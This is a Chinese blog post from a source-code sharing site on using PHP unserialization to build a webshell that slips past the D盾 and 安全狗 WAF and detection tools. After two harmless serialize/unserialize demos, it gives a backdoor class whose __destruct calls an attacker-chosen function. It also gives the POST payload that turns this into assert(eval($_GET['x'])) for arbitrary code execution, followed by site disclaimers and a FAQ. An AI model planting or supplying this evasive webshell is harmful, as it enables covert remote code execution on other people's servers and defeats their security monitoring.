PHP反序列化介绍
在PHP进行反序列化时,会将序列化中的变量传入类中,并且调用__destuct等魔法函数。巧妙应用可达到免杀D盾,过安全狗等WAF软件的效果。
TestCode1:
<?php
class A{
public $name = 'xxxx';
function __destruct(){
echo $this->name;
}
}
echo serialize(new A());
?>输出:
xxxxO:1:"A":1:{s:4:"name";s:4:"xxxx";}
TestCode2:
<?php
class A{
public $name = 'xxxx';
function __destruct(){
echo $this->name;
}
}
unserialize('O:1:"A":1:{s:4:"name";s:9:"wogaosuni";}');
?>输出:
wogaosuni可以发现原来的变量已经被我们替换了。
利用反序列化写马绕过D盾等WAF
代码不做过多解释,啥子都能看明白
<?php
class A{
public $name;
public $male;
function __destruct(){
$a = $this->name;
$a($this->male);
}
}
unserialize($_POST['un']);
?>POST传参传入
un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:16:"eval($_GET["x"])";}GET传参传入:
x=phpinfo();效果
-
PHP反序列化免杀D盾 -
免杀D盾 -
免杀过安全狗
声明:本站发布的文章及附件仅限用于学习和研究目的.请勿用于商业或违法用途,否则后果请用户自负。 本站所有资源不带技术支持,下载资源请24小时内删除,如用于违法用途,或者商业用途,一律使用者承担。
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!hnymwl@foxmail.com2. 您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容资源!
3. 如果你也有好源码或者教程,可以到审核区发布,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 本站不保证所提供下载的资源的准确性、安全性和完整性,源码仅供下载学习之用!
8. 如用于商业或者违法用途,与本站无关,一切后果请用户自负!
阿奇源码 » 利用PHP反序列化免杀D盾、安全狗等WAF软件
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 提示下载完但解压或打开不了?
- 找不到素材资源介绍文章里的示例图片?
- 开通终身会员能下载全站资源码?
